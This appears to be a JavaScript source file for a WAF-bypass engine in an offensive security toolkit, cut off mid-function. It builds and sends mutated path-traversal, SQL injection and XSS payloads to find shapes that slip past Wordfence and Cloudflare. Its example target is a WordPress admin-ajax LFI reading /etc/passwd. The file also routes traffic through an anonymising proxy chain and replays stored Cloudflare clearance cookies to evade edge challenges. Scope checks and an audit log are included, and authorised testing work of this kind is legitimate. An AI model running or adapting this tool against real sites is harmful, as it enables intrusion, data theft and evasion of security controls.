// VARVEL -- wafbypass: the WAF-bypass mutation engine (authorized engagements only).
//
// Why it exists: against a Wordfence+Cloudflare target, the naive public exploit shape
// for an unauthenticated WordPress LFI (POST /wp-admin/admin-ajax.php,
// action=madara_load_more, template=../../../../../../etc/passwd) gets 403-signed by
// Wordfence. The question this engine answers is a general one: which MUTATION of the
// payload does the WAF not sign while the server-side stack still executes it? The
// matrix is class-driven (lfi today; sqli/xss ship as real but shallower matrices) so
// new classes plug into the same oracle + egress + governance skeleton.
//
// THE HONESTY CONTRACT (core doctrine, non-negotiable): a shape is reported as passing
// ONLY when the success marker regex is observed in the response body AND the shape
// survives 3 stability re-verifications. No marker, no bypass claim -- ever. A shape
// that passes once and then fails re-verification is recorded under unstable[] and is
// explicitly NOT claimed. Gaps are phrased "unobserved, not absent".
//
// GOVERNANCE: the signed engagement scope is checked BEFORE any request (target host
// resolved, every resolved IP must sit inside the signed CIDRs; the refusal prints the
// signed scope). ALL egress rides the ghost chain (engine/ghost) -- a public target with
// no configured/verified chain is refused fail-closed; private/range targets go direct
// per ghost doctrine (lab traffic never leaves the lab). One audit line per run.
//
// Pacing/budget: sequential requests, paceMs apart request-start to request-start
// (human cadence default 1200ms), hard request budget counting stability re-checks.
//
// THE VAULT RIDE (2026-08-10, the manhuaus lesson: a cookieless matrix against a
// Cloudflare-challenged zone is 24/24 burned at the edge even when a valid clearance
// sits in the vault): by default the engine AUTO-RIDES a valid, unexpired clearance
// vault entry for the target zone -- every request then carries the entry's EXACT
// cookie + UA (scrubHeaders pins the vault UA through the persona scrub) over the
// transport the entry's egressId binds (broker.resolveRideTransport: a chain-keyed
// entry exits the armed ghost chain whose canonical id MATCHES the entry's, a
// direct-keyed entry rides direct where ghost doctrine allows, fail-closed states are
// inherited as refusals). The lookup runs under rideEgressId parity (the same egress
// id the mint side vaults under); opts.egressId / opts.vaultPath / opts.ghost are the
// seams. --no-ride forces cookieless; no valid/expired entry proceeds cookieless with
// an explicit gaps[] note, never a silent assumption. The report names the ride
// ({ ride: { egressId, transport, mintedAt, expiresAt } }) -- the cookie itself is a
// live credential and NEVER appears in the report or audit line.

import http from 'node:http';
import https from 'node:https';
import dns from 'node:dns';
import { appendFileSync, mkdirSync } from 'node:fs';
import { join, dirname } from 'node:path';
import { fileURLToPath } from 'node:url';
import { Ghost, isPrivateDest, scrubHeaders, chainEgressId } from '../engine/ghost.mjs';
import { inAnyCidr, parseIp } from '../engine/ipaddr.mjs';
import { Settings } from '../engine/settings.mjs';
import { clearanceFor, resolveRideTransport } from './clearance/broker.mjs';

const BODY_CAP = 256 * 1024;   // marker evidence lives in the body; cap like cfmap
const DEFAULT_PACE = 1200;     // human cadence -- WAF'd targets rate-limit the impatient
const DEFAULT_BUDGET = 60;     // hard request budget (mutations + stability re-checks)
const DEFAULT_STABILITY = 3;   // a PASS is re-verified this many times before it is claimed
const DEFAULT_TIMEOUT = 12000;

// WAF block signatures: matched case-insensitively against body + headers.
// Overridable via --block-sig (the operator knows the target's exact block page).
export const DEFAULT_BLOCK_SIGS = ['wordfence', 'cf-mitigated', 'generated by cloudflare'];

export const LFI_BASE = '../../../../../../../etc/passwd';
export const SQLI_BASE = "' OR '1'='1";
export const XSS_BASE = '<script>alert(1)</script>';

const sleep = (ms) => new Promise((r) => setTimeout(r, ms));
const msg = (e) => String((e && e.message) || e);

// ---------------------------------------------------------------------------
// Mutation matrix
// ---------------------------------------------------------------------------
// A mutation is DATA plus a body/head placement descriptor:
//   { id, family, exotic, rank, note, payload, paramMode, bodyKind, headers, http10 }
// paramMode: single | dup-first | dup-last | array
// bodyKind:  form | multipart   (GET requests use query placement instead)
// `payload` is the WIRE representation: the engine writes it verbatim into the body
// or query -- encoding IS the mutation, so nothing is re-encoded downstream.
//
// NOTE (dispatch constraint): admin-ajax.php action dispatch requires form-encoded
// bodies, so JSON body variants are intentionally NOT generated for these endpoints --
// JSON shapes belong to the generic api classes only.

// Split an LFI base payload into traversal depth + target path.
function splitLfiBase(base) {
  const b = String(base || LFI_BASE);
  const m = /^((?:\.\.\/)+)(.*)$/.exec(b);
  if (m) return { depth: m[1].length / 3, target: m[2] };
  return { depth: 6, target: b.replace(/^\/+/, '') };
}

// Percent-encode every character (full), or dots+slashes only (dots), with an
// optional per-escape case alternation (mixed-case hex escapes).
function pct(str, what, alternateCase) {
  let out = '', flip = false;
  for (const ch of str) {
    const code = ch.codePointAt(0);
    const isDotSlash = ch === '.' || ch === '/';
    const encodeIt = what === 'full' || (what === 'dots' && isDotSlash);
    if (!encodeIt) { out += ch; continue; }
    let hex = code.toString(16).padStart(2, '0');
    if (alternateCase) { hex = flip ? hex.toUpperCase() : hex.toLowerCase(); flip = !flip; }
    out += '%' + hex;
  }
  return out;
}

// Double URL-encode dots+slashes: '.' -> '%252e', '/' -> '%252f'.
function pctDouble(str) {
  let out = '';
  for (const ch of str) {
    if (ch === '.') out += '%252e';
    else if (ch === '/') out += '%252f';
    else out += ch;
  }
  return out;
}

// The LFI matrix: traversal styles x encodings x parameter games x HTTP games.
// rank orders the run (most-likely / control first); exotic flags the long shots.
function lfiMutations(base) {
  const { depth, target } = splitLfiBase(base);
  const t = target;
  const plain = '../'.repeat(depth) + t;
  const muts = [];
  const add = (id, family, payload, opts = {}) =>
    muts.push({ id, family, payload, exotic: !!opts.exotic, note: opts.note || '', paramMode: opts.paramMode || 'single', bodyKind: opts.bodyKind || 'form', headers: opts.headers || null, http10: !!opts.http10 });

  // -- control: the naive public shape (expect the WAF to sign this one) --
  add('lfi-control-plain', 'traversal-style', plain, { note: 'CONTROL: the naive shape every public exploit uses -- establishes that the WAF signs it' });

  // -- traversal styles (filter-collapse and parser-differential shapes) --
  add('lfi-dotdotslash', 'traversal-style', '....//'.repeat(depth) + t, { note: 'strip-once filters collapse ....// to ../ -- the classic Wordfence-era dodge' });
  add('lfi-backslash', 'traversal-style', '..\\/'.repeat(depth) + t, { note: 'mixed separator: Windows/PHP accept ..\\/ as traversal, some signatures only match ../' });
  add('lfi-triple-dot', 'traversal-style', '..././'.repeat(depth) + t, { note: 'strip-once collapse: removing ../ from ..././ yields ../' });
  add('lfi-four-dot', 'traversal-style', '..../'.repeat(depth) + t, { note: 'strip-once collapse: removing ../ from ..../ yields ../' });
  add('lfi-nested', 'traversal-style', '.../'.repeat(depth) + t, { exotic: true, note: 'triple-dot nesting -- exotic parser-differential shape' });
  add('lfi-absolute', 'traversal-style', '/' + t, { note: 'absolute path, no traversal at all -- catches rules that only sign ../ sequences' });
  add('lfi-prefix-satisfying', 'traversal-style', 'templates/' + plain, { note: 'carries an expected prefix (templates/) before the traversal -- satisfies apps that substring-check the prefix' });
  add('lfi-suffix-null', 'traversal-style', plain + '%00', { exotic: true, note: 'null-byte truncation for the case where the server APPENDS .php -- pre-PHP-5.3.4 behavior, exotic today' });

  // -- encodings (applied to the plain style; one double-encoded collapse shape) --
  add('lfi-enc-full', 'encoding', pct(plain, 'full'), { note: 'per-char URL-encode of the whole payload -- WAF decodes once or not at all, PHP always decodes once' });
  add('lfi-enc-dots', 'encoding', pct(plain, 'dots'), { note: 'dots+slashes encoded (%2e%2e%2f), path left literal' });
  add('lfi-enc-double', 'encoding', pctDouble(plain), { note: 'double URL-encode (%252e%252e%252f) -- survives one decode on the WAF side, PHP decode leaves the traversal for a second pass' });
  add('lfi-enc-double-collapse', 'encoding', pctDouble('....//'.repeat(depth) + t), { note: 'double-encoded ....// collapse shape' });
  add('lfi-enc-overlong', 'encoding', plain.split('/').join('%c0%af'), { note: 'overlong UTF-8 slash (%c0%af) -- IIS/legacy decoders accept it as /, strict decoders reject it' });
  add('lfi-enc-mixedcase', 'encoding', pct(plain, 'dots', true), { note: 'mixed-case hex escapes (%2E%2e%2F) -- signatures written lowercase-only miss these' });
  add('lfi-enc-fullwidth', 'encoding', plain.split('.').join('%ef%bc%8e').split('/').join('%ef%bc%8f'), { exotic: true, note: 'fullwidth dot/slash (U+FF0E / U+FF0F, UTF-8 percent-encoded) -- exotic unicode-normalization differential' });

  // -- parameter games (desync between what the WAF inspects and what PHP uses) --
  add('lfi-dup-first-wins', 'param-game', plain, { paramMode: 'dup-first', note: 'duplicate param, payload FIRST + benign second -- wins when the app reads the first occurrence while the WAF inspects the last (or vice versa)' });
  add('lfi-dup-last-wins', 'param-game', plain, { paramMode: 'dup-last', note: 'duplicate param, benign FIRST + payload last -- PHP parse_str keeps the LAST occurrence; WAFs that inspect only the first see the benign value' });
  add('lfi-array', 'param-game', plain, { paramMode: 'array', note: 'array form param[]=payload -- WAF expects a scalar, PHP hands the app an array' });
  add('lfi-multipart', 'param-game', plain, { bodyKind: 'multipart', note: 'multipart/form-data body -- some WAF tiers only inspect urlencoded bodies' });
  add('lfi-charset-explicit', 'param-game', plain, { headers: { 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8' }, note: 'explicit charset -- decoding-differential probe' });
  add('lfi-charset-exotic', 'param-game', plain, { exotic: true, headers: { 'content-type': 'application/x-www-form-urlencoded; charset=utf-16' }, note: 'declared utf-16 charset with an ASCII body (header-only game -- a truly transcoded body is a separate transport, unobserved, not absent)' });

  // -- HTTP games. These target ORIGIN-DIRECT requests: Cloudflare normalizes or strips
  //    override headers aggressively at the edge, so a block here does not prove the
  //    origin signs the shape (unobserved, not absent).
  add('lfi-hdr-x-original-url', 'http-game', plain, { headers: { 'x-original-url': null }, note: 'X-Original-URL path-override header (value = path?param=payload) -- origin-direct technique; Cloudflare strips/normalizes it at the edge' });
  add('lfi-hdr-x-rewrite-url', 'http-game', plain, { headers: { 'x-rewrite-url': null }, note: 'X-Rewrite-URL path-override header -- origin-direct technique; Cloudflare strips/normalizes it at the edge' });
  add('lfi-hdr-method-override', 'http-game', plain, { headers: { 'x-http-method-override': 'GET' }, note: 'method-override header (POST body, declared GET) -- verb-tampering differential' });
  add('lfi-http10', 'http-game', plain, { http10: true, note: 'HTTP/1.0 downgrade -- some WAF tiers only inspect 1.1 keep-alive traffic' });

  return muts.map((m, i) => ({ ...m, rank: i * 10 }));
}

// Generic classes: shallower but real matrices -- the oracle/egress/governance skeleton
// is class-agnostic, so these plug straight in. Payloads are wire-safe (structurally
// percent-encoded) because quotes/spaces would otherwise corrupt the form body.
function sqliMutations(base) {
  const b = String(base || SQLI_BASE);
  const enc = (s) => encodeURIComponent(s);
  const cases = b.replace(/or/ig, (m) => (m === 'or' ? 'oR' : 'Or')).replace(/and/ig, (m) => (m === 'and' ? 'aNd' : 'aND'));
  const commented = b.replace(/ /g, '/**/');
  const tabbed = b.replace(/ /g, '%09');
  const lined = b.replace(/ /g, '%0a');
  const muts = [
    { id: 'sqli-encoded', payload: enc(b), note: 'structural URL-encode (control for this class)' },
    { id: 'sqli-case', payload: enc(cases), note: 'keyword case variation -- case-sensitive signatures miss oR/aNd' },
    { id: 'sqli-comment', payload: enc(commented), note: 'inline comments /**/ replace whitespace' },
    { id: 'sqli-tab', payload: enc(tabbed), note: 'tab (%09) as whitespace' },
    { id: 'sqli-newline', payload: enc(lined), note: 'newline (%0a) as whitespace' },
    { id: 'sqli-double', payload: enc(b).replace(/%/g, '%25'), note: 'double URL-encode' },
    { id: 'sqli-null-prefix', payload: '%00' + enc(b), exotic: true, note: 'leading null byte -- exotic' },
    { id: 'sqli-fullwidth-quote', payload: enc(b).replace(/%27/gi, '%ef%bc%87'), exotic: true, note: 'fullwidth apostrophe (U+FF07) -- exotic normalization differential' },
  ];
  return muts.map((m, i) => ({ family: 'sqli-generic', paramMode: 'single', bodyKind: 'form', headers: null, http10: false, ...m, exotic: !!m.exotic, rank: i * 10 }));
}

function xssMutations(base) {
  const b = String(base || XSS_BASE);
  const enc = (s) => encodeURIComponent(s);
  const cased = b.replace(/script/ig, (m) => m.split('').map((c, i) => (i % 2 ? c.toUpperCase() : c.toLowerCase())).join(''));
  const img = '<img src=x onerror=alert(1)>';
  const muts = [
    { id: 'xss-encoded', payload: enc(b), note: 'structural URL-encode (control for this class)' },
    { id: 'xss-case', payload: enc(cased), note: 'tag case variation' },
    { id: 'xss-alt-vector', payload: enc(img), note: 'alternative vector (img/onerror) -- different signature family' },
    { id: 'xss-double', payload: enc(b).replace(/%/g, '%25'), note: 'double URL-encode' },
    { id: 'xss-null', payload: '%00' + enc(b), exotic: true, note: 'leading null byte -- exotic' },
    { id: 'xss-fullwidth-bracket', payload: enc(b).replace(/%3C/gi, '%ef%bc%9c').replace(/%3E/gi, '%ef%bc%9e'), exotic: true, note: 'fullwidth angle brackets (U+FF1C/U+FF1E) -- exotic' },
  ];
  return muts.map((m, i) => ({ family: 'xss-generic', paramMode: 'single', bodyKind: 'form', headers: null, http10: false, ...m, exotic: !!m.exotic, rank: i * 10 }));
}

const CLASSES = { lfi: lfiMutations, sqli: sqliMutations, xss: xssMutations };

// generateMutations({ klass, base }) -> ranked mutation list (data only; JSON-safe).
export function generateMutations({ klass = 'lfi', base } = {}) {
  const gen = CLASSES[String(klass || '').toLowerCase()];
  if (!gen) return [];
  return gen(base).sort((a, b) => a.rank - b.rank);
}

// ---------------------------------------------------------------------------
// Oracle: PASS only on marker evidence; BLOCKED on status/signature; else OTHER.
// ---------------------------------------------------------------------------
export function classify(res, { markerRe, blockSigs = DEFAULT_BLOCK_SIGS } = {}) {
  const status = Number(res && res.status) || 0;
  const body = String((res && res.body) || '');
  let headText = '';
  try { headText = Object.entries((res && res.headers) || {}).map(([k, v]) => k + ': ' + v).join('\n'); } catch { /* headers unreadable: body-only */ }
  const hay = (body + '\n' + headText).toLowerCase();
  const blockHits = (Array.isArray(blockSigs) ? blockSigs : DEFAULT_BLOCK_SIGS).filter((s) => hay.includes(String(s).toLowerCase()));
  const m = markerRe ? markerRe.exec(body) : null;
  if (m && status > 0 && status < 400) {
    const start = Math.max(0, m.index - 20);
    const snippet = body.slice(start, m.index + m[0].length + 40).replace(/\s+/g, ' ').slice(0, 90);
    return { verdict: 'PASS', snippet, blockHits, status };
  }
  if (status === 403 || status === 406 || blockHits.length) return { verdict: 'BLOCKED', blockHits, status };
  return { verdict: 'OTHER', blockHits, status };
}

// ---------------------------------------------------------------------------
// Governance: signed-scope check + ghost egress gate (fail-closed, never throws)
// ---------------------------------------------------------------------------
async function defaultResolve(host) {
  const r = await dns.promises.lookup(host, { all: true });
  return r.map((x) => x.address);
}

// Every resolved IP must sit inside the signed CIDRs; the refusal prints them.
async function scopeCheck(u, scope, resolve) {
  const cidrs = (Array.isArray(scope) ? scope : String(scope || '').split(',')).map((s) => String(s).trim()).filter(Boolean);
  if (!cidrs.length) {
    return { ok: false, reason: 'no signed engagement scope supplied -- refusing (fail-closed). Re-run with --scope <cidrCsv> from the signed session scope.', scope: [] };
  }
  const host = u.hostname;
  let ips = [];
  const literal = parseIp(host);
  if (literal) {
    ips = [literal.text];
  } else {
    try { ips = await resolve(host); } catch (e) { return { ok: false, reason: 'could not resolve ' + host + ' for scope verification (' + msg(e) + ') -- refusing (fail-closed)', scope: cidrs }; }
    if (!ips.length) return { ok: false, reason: host + ' resolved to no addresses -- scope unverifiable, refusing (fail-closed)', scope: cidrs };
  }
  const outside = ips.filter((ip) => !inAnyCidr(ip, cidrs));
  if (outside.length) {
    return {
      ok: false,
      reason: 'target ' + host + ' resolves outside the signed engagement scope (' + outside.join(', ') + ' not in scope) -- request REFUSED. Signed scope: ' + cidrs.join(','),
      scope: cidrs, resolved: ips, outside,
    };
  }
  return { ok: true, scope: cidrs, resolved: ips };
}

// Public egress requires a configured (and, in required mode, verified) ghost chain.
async function ensureGhost(ghost, u) {
  if (isPrivateDest(u.hostname)) return { ok: true, transport: 'direct (private/range destination -- ghost doctrine: lab traffic never leaves the lab)' };
  if (!ghost || ghost.mode === 'off' || !ghost.chain.length) {
    return { ok: false, reason: 'ghost chain unavailable -- public egress REFUSED (fail-closed). Configure ghost.mode + ghost.chain (e.g. Mullvad socks5://10.64.0.1:1080) and verify the exit first.' };
  }
  if (ghost.mode === 'required' && !ghost.verifiedOk()) {
    try { await ghost.verify(); } catch { /* verify failure is handled below */ }
    if (!ghost.verifiedOk()) {
      return { ok: false, reason: 'ghost mode is required but the chain exit is NOT verified (exit != operator IP unproven) -- public egress REFUSED (fail-closed). Run the ghost self-check first.' };
    }
  }
  return { ok: true, transport: 'ghost chain (' + ghost.chain.length + ' hop(s))' };
}

function ghostFromSettings(engagement) {
  const g = new Ghost();
  try {
    const s = Settings.for(engagement);
    const mode = s.get('ghost.mode');
    if (mode !== 'off') g.configure({ mode, chain: s.get('ghost.chain'), checkUrl: s.get('ghost.checkUrl') });
  } catch { /* an unconfigured ghost stays off: the gate refuses public egress */ }
  return g;
}

// ---------------------------------------------------------------------------
// The vault ride resolution (auto-ride; --no-ride forces cookieless).
// The egressId the lookup rides under is derived from the SAME armed ghost the
// egress gate just vetted: ghost armed with a chain => the chain's canonical id
// (exactly what resolveMintEgress vaults under -- rideEgressId parity), else
// 'direct'. opts.egressId overrides explicitly (the operator seam). A valid,
// unexpired entry then binds the TRANSPORT through broker.resolveRideTransport --
// its fail-closed refusals are inherited as run refusals (riding the wrong egress
// burns the IP-bound cookie; the refusal says how to force cookieless).
// Result: { ok:true, ride: null, gap? } | { ok:true, ride } | { ok:false, reason }.
// Never throws.
// ---------------------------------------------------------------------------
async function resolveVaultRide(u, opts, ghost) {
  try {
    if (opts.ride === false) return { ok: true, ride: null }; // --no-ride: forced cookieless, no vault read
    const ghostMode = opts.ghostMode || (ghost && ghost.mode) || 'off';
    let egressId = 'direct';
    if (opts.egressId) egressId = String(opts.egressId);
    else if (ghostMode !== 'off' && ghost && ghost.chain && ghost.chain.length) {
      try { egressId = chainEgressId(ghost.chain); } catch { egressId = 'direct'; }
    }
    const entry = await clearanceFor(u.href, { egressId, ...(opts.vaultPath ? { vaultPath: opts.vaultPath } : {}) });
    if (!entry) {
      return { ok: true, ride: null, gap: 'no valid clearance for zone ' + u.host + ' -- edge challenge likely; mint first (clearance mint) or provide operator clearance' };
    }
    const t = await resolveRideTransport({ ghost, ghostMode, egressId, hostname: u.hostname });
    if (!t.ok) return { ok: false, reason: t.reason + ' (or pass --no-ride to force a cookieless run)' };
    const cookie = (entry.cookies || []).map((c) => c.name + '=' + c.value).join('; ');
    return {
      ok: true,
      ride: { egressId, transport: t.transport, mintedAt: entry.mintedAt || null, expiresAt: entry.expiresAt || null, ua: entry.ua, cookie, agents: t.agents, direct: !!t.direct },
    };
  } catch (e) { return { ok: false, reason: 'vault ride resolution failed (' + msg(e) + ') -- refusing (fail-closed)' }; }
}

// The report-facing ride view: names the binding WITHOUT the credential material
// (the cookie and UA string ride the wire, never the report -- OPSEC, mirrored in
// lfichain's session-id masking doctrine).
function rideReport(ride) {
  return ride ? { egressId: ride.egressId, transport: ride.transport, mintedAt: ride.mintedAt, expiresAt: ride.expiresAt } : null;
}

// ---------------------------------------------------------------------------
// Default requester: rides the ghost agents (chain for public, direct for private).
// With a vault ride, the requester is bound to the ENTRY's transport instead: a
// chain-keyed entry exits the ghost chain's agents; a sanctioned direct ride
// (direct-bound entry under ghost off|on, or private/range doctrine) must NOT
// silently re-enter the chain -- cf_clearance is IP-bound, so the wire egress is
// the entry's egressId, whichever side of the chain that is. The clearance
// identity survives the scrub: the vault's EXACT UA is pinned as the persona and
// the entry's cookie header rides every request. Resolves { status, headers,
// body } -- network failure is DATA ({ status: 0, error }), never an exception
// (cfmap doctrine).
// ---------------------------------------------------------------------------
function defaultRequester(ghost, { timeoutMs = DEFAULT_TIMEOUT, baseHeaders = {}, ride = null } = {}) {
  return ({ method, url, headers, body }) => new Promise((resolve) => {
    let u;
    try { u = new URL(String(url)); } catch { return resolve({ status: 0, error: 'unparseable request URL' }); }
    const agents = ride ? ride.agents : (ghost ? ghost.agents() : null);
    // Defense in depth: never emit public traffic without a chain, whatever the gate did
    // -- unless the ride gate sanctioned direct egress for this entry's binding.
    if (!isPrivateDest(u.hostname) && !agents && !(ride && ride.direct)) {
      return resolve({ status: 0, error: 'ghost chain unavailable -- public egress refused' });
    }
    const lib = u.protocol === 'https:' ? https : http;
    const hdrs = scrubHeaders({ accept: '*/*', ...baseHeaders, ...(headers || {}), ...(ride && ride.cookie ? { cookie: ride.cookie } : {}) }, ride ? { ua: ride.ua } : undefined);
    if (body != null && !Object.keys(hdrs).some((k) => k === 'content-type')) hdrs['content-type'] = 'application/x-www-form-urlencoded';
    let settled = false;
    const done = (v) => { if (settled) return; settled = true; resolve(v); };
    let req;
    try {
      req = lib.request({
        hostname: u.hostname, port: u.port || (u.protocol === 'https:' ? 443 : 80),
        path: u.pathname + u.search, method: method || 'GET', timeout: timeoutMs,
        rejectUnauthorized: false,
        agent: agents ? (u.protocol === 'https:' ? agents.httpsAgent : agents.httpAgent) : undefined,
        headers: hdrs,
      }, (r) => {
        let text = '';
        r.on('data', (d) => { if (text.length < BODY_CAP) text += d.toString('latin1', 0, Math.max(0, BODY_CAP - text.length)); });
        r.on('end', () => done({ status: r.statusCode, headers: r.headers, body: text }));
      });
    } catch (e) { return done({ status: 0, error: msg(e) }); }
    req.on('timeout', () => { try { req.destroy(); } catch {} done({ status: 0, error: 'request timed out (' + timeoutMs + 'ms)' }); });
    req.on('error', (e) => done({ status: 0, error: msg(e) }));
    if (body != null) req.write(body);
    req.end();
  });
}

// ---------------------------------------------------------------------------
// Request construction: where the payload lands for this mutation.
// ---------------------------------------------------------------------------
const BENIGN_VALUE = 'index';

function buildRequest(mut, { u, method, param, template, baseHeaders }) {
  const headers = { ...(baseHeaders || {}), ...(mut.headers || {}) };
  let url = u.href;
  let body = null;
  let contentType = null;
  const hasBody = method !== 'GET' && method !== 'HEAD';

  // Path-override header games carry the injected URL in the header itself.
  for (const k of ['x-original-url', 'x-rewrite-url']) {
    if (k in headers && headers[k] == null) headers[k] = u.pathname + '?' + param + '=' + mut.payload;
  }

  if (!hasBody) {
    // Body-family mutations (duplicate/array/multipart/charset) need a request body;
    // on a GET/HEAD they are unexpressible -- the engine records an honest skip.
    if (mut.paramMode !== 'single' || mut.bodyKind === 'multipart') return null;
    if (mut.headers && Object.keys(mut.headers).some((k) => k.toLowerCase() === 'content-type')) return null;
    const sep = u.search ? '&' : '?';
    url = u.origin + u.pathname + u.search + sep + param + '=' + mut.payload;
    return { method, url, headers, body: null };
  }

  if (mut.bodyKind === 'multipart') {
    const boundary = '----varvelwafbypass7f3a9c';
    body = '--' + boundary + '\r\nContent-Disposition: form-data; name="' + param + '"\r\n\r\n' + mut.payload + '\r\n--' + boundary + '--\r\n';
    contentType = 'multipart/form-data; boundary=' + boundary;
  } else {
    const inTemplate = (v) => (template ? template.split('%%PAYLOAD%%').join(v) : param + '=' + v);
    if (mut.paramMode === 'dup-first') body = inTemplate(mut.payload) + '&' + param + '=' + BENIGN_VALUE;
    else if (mut.paramMode === 'dup-last') body = inTemplate(BENIGN_VALUE) + '&' + param + '=' + mut.payload;
    else if (mut.paramMode === 'array') body = template ? null : param + '[]=' + mut.payload; // template+array: skipped by the engine with an honest gap
    else body = inTemplate(mut.payload);
  }
  if (body == null) return null; // unexpressible combination -- the engine records a skip
  if (contentType) headers['content-type'] = contentType;
  return { method, url, headers, body };
}

// ---------------------------------------------------------------------------
// The audit line: one JSONL entry per run. Default sink appends to
// varvel/data/wafbypass-audit.jsonl (best-effort, never throws); injectable for tests.
// ---------------------------------------------------------------------------
const AUDIT_FILE = () => process.env.VARVEL_WAFBYPASS_AUDIT || join(dirname(fileURLToPath(import.meta.url)), '..', 'data', 'wafbypass-audit.jsonl');
function defaultAudit(entry) {
  try { mkdirSync(dirname(AUDIT_FILE()), { recursive: true }); appendFileSync(AUDIT_FILE(), JSON.stringify(entry) + '\n'); } catch { /* audit must never break the tool */ }
}

// ---------------------------------------------------------------------------
// The engine
// ---------------------------------------------------------------------------
export async function wafBypass(url, opts = {}) {
  const at0 = new Date().toISOString();
  const gaps = [];
  const auditSink = opts.audit === false ? null : (typeof opts.audit === 'function' ? opts.audit : defaultAudit);
  const finish = (report) => {
    if (auditSink) {
      try {
        auditSink({
          ts: new Date().toISOString(), tool: 'wafbypass', url: String(url || ''), class: String(opts.klass || opts.class || 'lfi'),
          param: String(opts.param || ''), ok: !!report.ok, tried: report.tried || 0, passing: (report.passingShapes || []).length,
          blocked: report.blockedCount || 0, budget: report.budget || 0,
        });
      } catch { /* audit tap must never break the tool */ }
    }
    return report;
  };
  const refuse = (reason, extra = {}) => finish({ ok: false, reason, gaps, at: at0, ...extra });

  try {
    // -- usage validation (refusals are data, never throws) --
    let u;
    try {
      u = new URL(String(url || ''));
      if (u.protocol !== 'http:' && u.protocol !== 'https:') throw new Error('scheme');
    } catch { return refuse('usage: --url must be an http(s) URL, got ' + JSON.stringify(url)); }
    const param = String(opts.param || '').trim();
    if (!param) return refuse('usage: --param <name> is required (the injection point, e.g. template)');
    const klass = String(opts.klass || opts.class || 'lfi').toLowerCase();
    if (!CLASSES[klass]) return refuse('usage: --class must be one of ' + Object.keys(CLASSES).join('|') + ' (got ' + klass + ')');
    if (opts.marker == null || opts.marker === '') {
      return refuse('usage: --marker <regex> is required -- the honesty contract: no success evidence, no bypass claim');
    }
    let markerRe;
    try { markerRe = new RegExp(String(opts.marker), 'i'); } catch (e) { return refuse('usage: --marker is not a valid regex: ' + msg(e)); }
    const method = String(opts.method || 'POST').toUpperCase();
    const budget = Math.max(1, Math.floor(Number(opts.budget)) || DEFAULT_BUDGET);
    const paceMs = Math.max(0, Number(opts.paceMs != null ? opts.paceMs : opts.pace) || 0) || (opts.paceMs == null && opts.pace == null ? DEFAULT_PACE : 0);
    const stability = Math.max(1, Math.floor(Number(opts.stability)) || DEFAULT_STABILITY);
    const first = !!opts.first;
    const blockSigs = Array.isArray(opts.blockSigs) && opts.blockSigs.length ? opts.blockSigs.map(String) : DEFAULT_BLOCK_SIGS;
    const template = opts.bodyTemplate != null ? String(opts.bodyTemplate) : null;
    const baseHeaders = opts.headers && typeof opts.headers === 'object' ? opts.headers : {};

    // -- governance gate 1: signed scope (BEFORE any request; refusal prints the CIDRs) --
    const scopeRes = await scopeCheck(u, opts.scope, opts.resolve || defaultResolve);
    if (!scopeRes.ok) return refuse(scopeRes.reason, { scope: scopeRes.scope || [], resolved: scopeRes.resolved });

    // -- governance gate 2: ghost egress --
    const ghost = opts.ghost || ghostFromSettings(opts.engagement);
    const gate = await ensureGhost(ghost, u);
    if (!gate.ok) return refuse(gate.reason, { scope: scopeRes.scope, resolved: scopeRes.resolved });

    // -- vault ride: auto-ride a valid clearance for the zone unless --no-ride --
    const rideRes = await resolveVaultRide(u, opts, ghost);
    if (!rideRes.ok) return refuse(rideRes.reason, { scope: scopeRes.scope, resolved: scopeRes.resolved });
    const ride = rideRes.ride;
    if (rideRes.gap) gaps.push(rideRes.gap);

    const requester = opts.requester || defaultRequester(ghost, { timeoutMs: opts.timeoutMs, baseHeaders, ride });
    const supportsHttp10 = !!opts.supportsHttp10; // the agent transport speaks HTTP/1.1 only

    // -- the matrix --
    const mutations = generateMutations({ klass, base: opts.basePayload });

    const passingShapes = [];
    const unstable = [];
    const others = [];
    const skipped = [];
    let used = 0, blockedCount = 0, mutationsTried = 0, lastStart = 0;
    let controlBlocked = null;

    // Transport-inexpressible variants are known UP FRONT (before --first can stop the
    // run): mark them skipped now so the gap report is complete even on a short run.
    const runnable = [];
    for (const mut of mutations) {
      if (mut.http10 && !supportsHttp10) {
        skipped.push({ id: mut.id, reason: 'HTTP/1.0 downgrade is not expressible through the agent transport (node http speaks 1.1)' });
      } else {
        runnable.push(mut);
      }
    }

    const send = async (req) => {
      const wait = lastStart ? paceMs - (Date.now() - lastStart) : 0;
      if (wait > 0) await sleep(wait);
      lastStart = Date.now();
      used++;
      return requester(req);
    };

    let stoppedByBudget = false;
    let stoppedByFirst = false;
    for (const mut of runnable) {
      const req = buildRequest(mut, { u, method, param, template, baseHeaders });
      if (!req) {
        skipped.push({ id: mut.id, reason: 'mutation is inexpressible with the given method/body-template combination' });
        continue;
      }
      if (used >= budget) { stoppedByBudget = true; break; }
      mutationsTried++;
      const res = await send(req);
      const cls = classify(res, { markerRe, blockSigs });
      if (mut.id === 'lfi-control-plain') controlBlocked = cls.verdict === 'BLOCKED';
      if (cls.verdict === 'BLOCKED') { blockedCount++; continue; }
      if (cls.verdict === 'OTHER') {
        if (others.length < 40) others.push({ id: mut.id, status: cls.status, size: String((res && res.body) || '').length, error: res && res.error });
        continue;
      }
      // PASS: re-verify stability before anything is claimed.
      let confirmed = 0;
      let budgetStarved = false;
      while (confirmed < stability) {
        if (used >= budget) { budgetStarved = true; break; }
        const rr = await send(req);
        const rc = classify(rr, { markerRe, blockSigs });
        if (rc.verdict !== 'PASS') break;
        confirmed++;
      }
      const entry = {
        mutation: { id: mut.id, family: mut.family, exotic: mut.exotic, note: mut.note, payload: mut.payload },
        status: cls.status,
        evidenceSnippet: cls.snippet,
        blockHits: cls.blockHits,
      };
      if (confirmed === stability) {
        passingShapes.push({ ...entry, stability: confirmed + '/' + stability + ' re-verified' });
        if (first) { stoppedByFirst = true; break; }
      } else {
        unstable.push({ ...entry, stability: confirmed + '/' + stability + (budgetStarved ? ' (budget exhausted)' : ' (re-check failed)'), verdict: 'NOT claimed -- failed stability re-verification' });
      }
    }

    // -- honest gaps --
    const untried = mutations.length - mutationsTried - skipped.length;
    if (stoppedByBudget && untried > 0) gaps.push(untried + ' mutation(s) untried (request budget ' + budget + ' exhausted) -- unobserved, not absent');
    if (stoppedByFirst && untried > 0) gaps.push(untried + ' mutation(s) untried (stopped at the first verified pass; re-run exhaustive for the full surface) -- unobserved, not absent');
    for (const s of skipped) gaps.push('skipped ' + s.id + ': ' + s.reason + ' -- unobserved, not absent');
